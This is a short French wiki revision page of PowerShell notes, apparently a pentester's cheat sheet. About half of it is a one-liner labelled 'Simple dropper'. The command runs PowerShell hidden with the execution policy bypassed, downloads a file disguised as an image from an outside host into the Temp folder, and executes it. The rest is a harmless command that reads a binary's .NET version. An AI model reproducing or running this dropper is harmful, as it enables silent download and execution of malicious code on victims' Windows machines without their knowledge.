PowerShell : Différence entre versions
(Page créée avec « Simple dropper powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... ») |
|||
Ligne 2 : | Ligne 2 : | ||
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png') |
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png') |
||
+ | |||
+ | |||
+ | |||
+ | Find the framework version of a binary |
||
+ | [Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion |
||
+ | v2.0.50727 |
Version du 31 octobre 2017 à 16:40
Simple dropper
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
Find the framework version of a binary
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion v2.0.50727